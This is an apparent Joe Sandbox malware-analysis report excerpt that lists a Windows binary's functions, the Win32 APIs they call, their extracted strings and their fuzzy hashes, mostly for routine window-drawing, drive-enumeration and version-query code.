Instruction ID: 4fbd9923a3633a79c3fe29fb5e8af572bd9bfea5d8cabe5702062777788a18d6
Opcode Fuzzy Hash: 8cf4d90d24b710f01b8413e09e10ab0a79a0cee39ea01687b76c1a24c8fffcac
Instruction Fuzzy Hash: 9AE06572B1624286EB44AB65F440279A290EB99F94F565034DB0D833A9DE7CD4908710

Function 00007FF7A5202BCF Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32 ref: 00007FF7A5202BE4

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 8585f7f64f3c872cdf94fb193dbdc54333e80748829e3d3e151e5918de675c21
Instruction ID: e4fc5e025c34b29875441d721bc669fde4e539d54d1181a101ed695709c4a041
Opcode Fuzzy Hash: 8585f7f64f3c872cdf94fb193dbdc54333e80748829e3d3e151e5918de675c21
Instruction Fuzzy Hash: D1C012B1615652D9E760DF20DC841EC3330FB1071CFC15021E60A5E4BCAF7C9648C340

Function 00007FF7A51E4318 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF7A51E431C

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: cf50d128dd3344e2a26665cf24b57cc892866eab895f7b642e8f36e24e0f0ced
Instruction ID: 57f80e7442fbcb2c92e3d0af4f1ac036c95b0d6c3e99bad1995f71cf0630b1df
Opcode Fuzzy Hash: cf50d128dd3344e2a26665cf24b57cc892866eab895f7b642e8f36e24e0f0ced
Instruction Fuzzy Hash: 28B09260F07A02C2EA083B516C8621463A4BF59B01FDA413AC10CC1374DF2C20A69720

Function 00007FF7A51DFD20 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4e4605b7b007d95894f61c83fec82003118576a017aad510c5c4214a882ee24
Instruction ID: 6941d554c5eed4c7f671f865fa3b37ce08004cef2c1a22f6caca676b039f9fbc
Opcode Fuzzy Hash: f4e4605b7b007d95894f61c83fec82003118576a017aad510c5c4214a882ee24
Instruction Fuzzy Hash: 3FF068B2B396558ADB94DF6DA84262977D0E70C780F908039D58DC3F58DA3C9150DF14

Function 00007FF7A51C59C8 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06a18b8ad93dc8222913c3b18848eb7fe0d0fd2f3d8a242d5e2f0303cc3a2d96
Instruction ID: 6f4a832eca20cae895a891924dccf66894daeb2b31604fb17f0ccda6a83f623f
Opcode Fuzzy Hash: 06a18b8ad93dc8222913c3b18848eb7fe0d0fd2f3d8a242d5e2f0303cc3a2d96
Instruction Fuzzy Hash: 64A00265A0FC42D4E705AB00FC50030A370EB72B25FD30472D00D454B99F3EA484CB21

Function 00007FF7A524E95C Relevance: 49.7, APIs: 33, Instructions: 231windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32 ref: 00007FF7A524E9C4
SetTextColor.GDI32 ref: 00007FF7A524E9CF
GetSysColorBrush.USER32 ref: 00007FF7A524E9E8
GetSysColor.USER32 ref: 00007FF7A524E9FA
SetBkColor.GDI32 ref: 00007FF7A524EA1B
SelectObject.GDI32 ref: 00007FF7A524EA2A
InflateRect.USER32 ref: 00007FF7A524EA4F
GetSysColor.USER32 ref: 00007FF7A524EA5A
CreateSolidBrush.GDI32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF7A525120A,?,?,?,00007FF7A51EAA77), ref: 00007FF7A524EA62
FrameRect.USER32 ref: 00007FF7A524EA75
DeleteObject.GDI32 ref: 00007FF7A524EA7E
InflateRect.USER32 ref: 00007FF7A524EAD3
FillRect.USER32 ref: 00007FF7A524EB03
GetWindowLongW.USER32 ref: 00007FF7A524EB22
SendMessageW.USER32 ref: 00007FF7A524EB6F

Part of subcall function 00007FF7A524ECB4: GetSysColor.USER32 ref: 00007FF7A524ECFB
Part of subcall function 00007FF7A524ECB4: SetTextColor.GDI32 ref: 00007FF7A524ED06
Part of subcall function 00007FF7A524ECB4: GetSysColorBrush.USER32 ref: 00007FF7A524ED21
Part of subcall function 00007FF7A524ECB4: GetSysColor.USER32 ref: 00007FF7A524ED34
Part of subcall function 00007FF7A524ECB4: GetSysColor.USER32 ref: 00007FF7A524ED5F
Part of subcall function 00007FF7A524ECB4: CreatePen.GDI32 ref: 00007FF7A524ED76
Part of subcall function 00007FF7A524ECB4: SelectObject.GDI32 ref: 00007FF7A524ED87
Part of subcall function 00007FF7A524ECB4: SetBkColor.GDI32 ref: 00007FF7A524ED97
Part of subcall function 00007FF7A524ECB4: SelectObject.GDI32 ref: 00007FF7A524EDAA
Part of subcall function 00007FF7A524ECB4: InflateRect.USER32 ref: 00007FF7A524EDD1
Part of subcall function 00007FF7A524ECB4: RoundRect.GDI32 ref: 00007FF7A524EDFD
Part of subcall function 00007FF7A524ECB4: GetWindowLongW.USER32 ref: 00007FF7A524EE0B

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: ef7366886db55824d460b1c50baab5321c9adbfaa8eab0a2c69b3322450da6b5
Instruction ID: a7dde857ad760cdf1f8320fb3c18e7b43198592693d7f311379c4c5852338931
Opcode Fuzzy Hash: ef7366886db55824d460b1c50baab5321c9adbfaa8eab0a2c69b3322450da6b5
Instruction Fuzzy Hash: FFA1B2B2F05A0286FB14AB61DC4457CA771BB5AF64F924230DE2E53BE8DF3DA4448360

Function 00007FF7A5224F30 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 247COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32 ref: 00007FF7A5224F61
GetDriveTypeW.KERNEL32 ref: 00007FF7A52250BE
SetErrorMode.KERNEL32 ref: 00007FF7A52252A3

Strings

Fixed, xrefs: 00007FF7A5225111
RAMDisk, xrefs: 00007FF7A52250ED
CDROM, xrefs: 00007FF7A52250F9
ATAPI, xrefs: 00007FF7A52251F0
Unknown, xrefs: 00007FF7A52250E1
iSCSI, xrefs: 00007FF7A522525E
Network, xrefs: 00007FF7A5225105
\\.\, xrefs: 00007FF7A5224FAE
MMC, xrefs: 00007FF7A522523A
SCSI, xrefs: 00007FF7A52251F9
ATA, xrefs: 00007FF7A52251E7
PhysicalDrive, xrefs: 00007FF7A5224FF5
SSD, xrefs: 00007FF7A522515D
1394, xrefs: 00007FF7A52251DE
SSA, xrefs: 00007FF7A52251D2
SAS, xrefs: 00007FF7A5225255
Virtual, xrefs: 00007FF7A5225231
FileBackedVirtual, xrefs: 00007FF7A5225228
USB, xrefs: 00007FF7A52251BA
Removable, xrefs: 00007FF7A522511D
Fibre, xrefs: 00007FF7A52251C6
SATA, xrefs: 00007FF7A522524C
RAID, xrefs: 00007FF7A5225202

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 94db47e06bd0190674c94e1b1137c27149ea748c604d997c0ecd6c7b010eced7
Instruction ID: 59da0a95aabb1851fa43cfd142cdff76db8f1237d6b7cb6b94f5659f186e45e8
Opcode Fuzzy Hash: 94db47e06bd0190674c94e1b1137c27149ea748c604d997c0ecd6c7b010eced7
Instruction Fuzzy Hash: D8B153A5B0EA0290EA55FB25DC4017CA361BB56F84BD78131DA0E5B6FCDF2CE945C720

Function 00007FF7A524ECB4 Relevance: 39.2, APIs: 26, Instructions: 179windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32 ref: 00007FF7A524ECFB
SetTextColor.GDI32 ref: 00007FF7A524ED06
GetSysColorBrush.USER32 ref: 00007FF7A524ED21
GetSysColor.USER32 ref: 00007FF7A524ED34
CreateSolidBrush.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A524E98C), ref: 00007FF7A524ED3E
GetSysColor.USER32 ref: 00007FF7A524ED5F
CreatePen.GDI32 ref: 00007FF7A524ED76
SelectObject.GDI32 ref: 00007FF7A524ED87
SetBkColor.GDI32 ref: 00007FF7A524ED97
SelectObject.GDI32 ref: 00007FF7A524EDAA
InflateRect.USER32 ref: 00007FF7A524EDD1
RoundRect.GDI32 ref: 00007FF7A524EDFD
GetWindowLongW.USER32 ref: 00007FF7A524EE0B
SendMessageW.USER32 ref: 00007FF7A524EE58
GetWindowTextW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A524E98C), ref: 00007FF7A524EE90
InflateRect.USER32 ref: 00007FF7A524EEB3
DrawFocusRect.USER32 ref: 00007FF7A524EEC1
GetSysColor.USER32 ref: 00007FF7A524EED0
SetTextColor.GDI32 ref: 00007FF7A524EEDB
DrawTextW.USER32 ref: 00007FF7A524EEF9
SelectObject.GDI32 ref: 00007FF7A524EF17
DeleteObject.GDI32 ref: 00007FF7A524EF25
SelectObject.GDI32 ref: 00007FF7A524EF33
DeleteObject.GDI32 ref: 00007FF7A524EF3E
SetTextColor.GDI32 ref: 00007FF7A524EF4A
SetBkColor.GDI32 ref: 00007FF7A524EF5A

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: be73899effbf77ebd9d54faa89356d5f551f326618c8bd974714f6933a768820
Instruction ID: c9fbd3329d917353b5d503e85afaa5a86d7854d8a63ce93320f5c6d25a8690d7
Opcode Fuzzy Hash: be73899effbf77ebd9d54faa89356d5f551f326618c8bd974714f6933a768820
Instruction Fuzzy Hash: BB7194B6B09A4186E724AB25EC4467AB361FB9AFB0F814234DD5E43BE8DF3DD4448710

Function 00007FF7A5246EA0 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 268windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32 ref: 00007FF7A5246FE4
GetDesktopWindow.USER32 ref: 00007FF7A5246FF4
GetWindowRect.USER32 ref: 00007FF7A5247002
GetWindowLongW.USER32 ref: 00007FF7A524705E
DestroyWindow.USER32 ref: 00007FF7A524707C
CreateWindowExW.USER32 ref: 00007FF7A52470D3
SendMessageW.USER32 ref: 00007FF7A52470EF
SendMessageW.USER32 ref: 00007FF7A5247108
SendMessageW.USER32 ref: 00007FF7A5247123
SendMessageW.USER32 ref: 00007FF7A5247140
IsWindowVisible.USER32 ref: 00007FF7A5247192
SendMessageW.USER32 ref: 00007FF7A52471B6
SendMessageW.USER32 ref: 00007FF7A52471D1
GetWindowRect.USER32 ref: 00007FF7A52471EC
MonitorFromPoint.USER32 ref: 00007FF7A5247210
GetMonitorInfoW.USER32 ref: 00007FF7A5247224
CopyRect.USER32 ref: 00007FF7A5247237
SendMessageW.USER32 ref: 00007FF7A524729C

Strings

tooltips_class32, xrefs: 00007FF7A5247095

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: tooltips_class32
API String ID: 698492251-1918224756
Opcode ID: 134fb4e1424d2fb4e321c1dd5c8cc0f154a29b10d7bebbc83ea585521f9a7016
Instruction ID: 91cd4a76c807231534ef2c0f4db7f914bd48367ee3db4df65a5abadc2d7de14f
Opcode Fuzzy Hash: 134fb4e1424d2fb4e321c1dd5c8cc0f154a29b10d7bebbc83ea585521f9a7016
Instruction Fuzzy Hash: C4C14E73A0A7418AE714DF65E8442ADB7B0FB8AB84F950035DA5E477A8CF3DE841C750

Function 00007FF7A5212C10 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 175windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32 ref: 00007FF7A5212C3E
SendMessageW.USER32 ref: 00007FF7A5212C56
SetWindowTextW.USER32 ref: 00007FF7A5212C6F
GetDlgItem.USER32 ref: 00007FF7A5212C87
SetWindowTextW.USER32 ref: 00007FF7A5212C94
GetDlgItem.USER32 ref: 00007FF7A5212CAE
SetWindowTextW.USER32 ref: 00007FF7A5212CBB
SendDlgItemMessageW.USER32 ref: 00007FF7A5212CE0
SendDlgItemMessageW.USER32 ref: 00007FF7A5212D03
GetWindowRect.USER32 ref: 00007FF7A5212D14
SetWindowTextW.USER32 ref: 00007FF7A5212DB5
GetDesktopWindow.USER32 ref: 00007FF7A5212DBB
GetWindowRect.USER32 ref: 00007FF7A5212DC8
MoveWindow.USER32 ref: 00007FF7A5212E20
GetClientRect.USER32 ref: 00007FF7A5212E31
PostMessageW.USER32 ref: 00007FF7A5212E60
SetTimer.USER32 ref: 00007FF7A5212E91

Strings

@, xrefs: 00007FF7A5212DD7

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID: @
API String ID: 3869813825-2766056989
Opcode ID: b82c187733dd5023c28d903207b62df0d5996a373ba8083c7f15af3311f57f4a
Instruction ID: f760ec28f97c6f450df8250d8cb87eda3cd4658a2a7ca6c4ee32c2d3dbfd37e3
Opcode Fuzzy Hash: b82c187733dd5023c28d903207b62df0d5996a373ba8083c7f15af3311f57f4a
Instruction Fuzzy Hash: 2D817AB2A06A4286E740EF76DC5066D73A0FB45F88F814131EE0EA76ACDF39E945C710

Function 00007FF7A51A2620 Relevance: 28.7, APIs: 19, Instructions: 201COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A51A2750: GetWindowLongPtrW.USER32 ref: 00007FF7A51A2766

GetSysColor.USER32 ref: 00007FF7A51A2663
GetSysColor.USER32 ref: 00007FF7A51A26F8
SetTextColor.GDI32 ref: 00007FF7A51A2703
SetBkMode.GDI32 ref: 00007FF7A51A2718
GetStockObject.GDI32 ref: 00007FF7A51A2723
GetSysColor.USER32 ref: 00007FF7A51EA84E
GetWindowLongW.USER32 ref: 00007FF7A51EA863
SetBkColor.GDI32 ref: 00007FF7A51EA940

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Color$LongWindow$ModeObjectStockText
String ID:
API String ID: 554392163-0
Opcode ID: 75ec6bcd28a8efb3125b08e197a7caecd4c99aa61c3caa47667afd5c8d51fa7a
Instruction ID: 62993d4f5689c0f03245d95d638ab2cc1cf29ef58b4ebf54c7072f627ca8ad10
Opcode Fuzzy Hash: 75ec6bcd28a8efb3125b08e197a7caecd4c99aa61c3caa47667afd5c8d51fa7a
Instruction Fuzzy Hash: DE81CC61E0A55682EA32B725F8486799391AF87F50FD70231DE6D036FCDE3CA846C710

Function 00007FF7A521C81C Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 140COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION ref: 00007FF7A521C841
GetFileVersionInfoW.VERSION ref: 00007FF7A521C869
wcscpy.LIBCMT ref: 00007FF7A521C8A6
wcscat.LIBCMT ref: 00007FF7A521C8C8
wcsstr.LIBVCRUNTIME ref: 00007FF7A521C8D3
VerQueryValueW.VERSION ref: 00007FF7A521C8F4
wcscat.LIBCMT ref: 00007FF7A521C934
wcscat.LIBCMT ref: 00007FF7A521C93F
wcscat.LIBCMT ref: 00007FF7A521C94A
VerQueryValueW.VERSION ref: 00007FF7A521C9A0

Strings

DefaultLangCodepage, xrefs: 00007FF7A521C94F
%u.%u.%u.%u, xrefs: 00007FF7A521C9BE
StringFileInfo\, xrefs: 00007FF7A521C8BE
\VarFileInfo\Translation, xrefs: 00007FF7A521C8ED
04090000, xrefs: 00007FF7A521C92A

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: wcscat$FileInfoQueryValueVersion$Sizewcscpywcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 222038402-1459072770
Opcode ID: cd0cb460e9213e7bbd7e72b67b5e96f7d513e8dcebbe310305f3515603c5f5bf
Instruction ID: 5a1dcdc0f3115916631cf1a25dfcb70affae03b04fe9e9edf8e18465ab7c5e90
Opcode Fuzzy Hash: cd0cb460e9213e7bbd7e72b67b5e96f7d513e8dcebbe310305f3515603c5f5bf
Instruction Fuzzy Hash: BC51C0A5B0A64242EA15FB12E9501B9A391BF87FD0FC24431ED0E47BAADF3DE541C724

Function 00007FF7A5246608 Relevance: 25.0, APIs: 3, Strings: 11, Instructions: 475windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32 ref: 00007FF7A52466C7
SendMessageW.USER32 ref: 00007FF7A5246749

Strings

GETITEMCOUNT, xrefs: 00007FF7A5246922
CHECK, xrefs: 00007FF7A524676F
EXISTS, xrefs: 00007FF7A5246833
ISCHECKED, xrefs: 00007FF7A5246A78
SELECT, xrefs: 00007FF7A5246B0B
EXPAND, xrefs: 00007FF7A52468B4
GETTOTALCOUNT, xrefs: 00007FF7A52466F9
GETTEXT, xrefs: 00007FF7A52469F7
GETSELECTED, xrefs: 00007FF7A524698F
UNCHECK, xrefs: 00007FF7A5246B76
COLLAPSE, xrefs: 00007FF7A52467D1

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: 3f2e69d4aa51dbb406168e8eec17f7dda2e2331c7f002e480690ed7ff1453b94
Instruction ID: 7041a3739bdf7f050e27345cc6dcb26712fe251cb5b76f8bf14f7905c5e66ca4
Opcode Fuzzy Hash: 3f2e69d4aa51dbb406168e8eec17f7dda2e2331c7f002e480690ed7ff1453b94
Instruction Fuzzy Hash: 4C12E293B1A65382EE51BB25DC411BDE7A0AF56F94B8A4531CE0D467E9EE3CF8418330

Function 00007FF7A5251254 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 162windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A51A2A54: GetWindowLongPtrW.USER32 ref: 00007FF7A51A2A71

DragQueryPoint.SHELL32 ref: 00007FF7A5251298

Part of subcall function 00007FF7A524F014: ClientToScreen.USER32(00000000,?,?,?,?,00007FF7A5250BC9), ref: 00007FF7A524F054
Part of subcall function 00007FF7A524F014: GetWindowRect.USER32(?,?,?,?,00007FF7A5250BC9), ref: 00007FF7A524F0E3
Part of subcall function 00007FF7A524F014: PtInRect.USER32 ref: 00007FF7A524F0F3

SendMessageW.USER32 ref: 00007FF7A525130F
DragQueryFileW.SHELL32 ref: 00007FF7A5251321
DragQueryFileW.SHELL32 ref: 00007FF7A5251347
wcscat.LIBCMT ref: 00007FF7A525137B
SendMessageW.USER32 ref: 00007FF7A5251392
SendMessageW.USER32 ref: 00007FF7A52513AC
SendMessageW.USER32 ref: 00007FF7A52513C4
SendMessageW.USER32 ref: 00007FF7A52513E9
DragFinish.SHELL32 ref: 00007FF7A52513F2
DefDlgProcW.USER32 ref: 00007FF7A5251520

Strings

@GUI_DROPID, xrefs: 00007FF7A5251415
@GUI_DRAGID, xrefs: 00007FF7A525146B
@GUI_DRAGFILE, xrefs: 00007FF7A52514B4

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

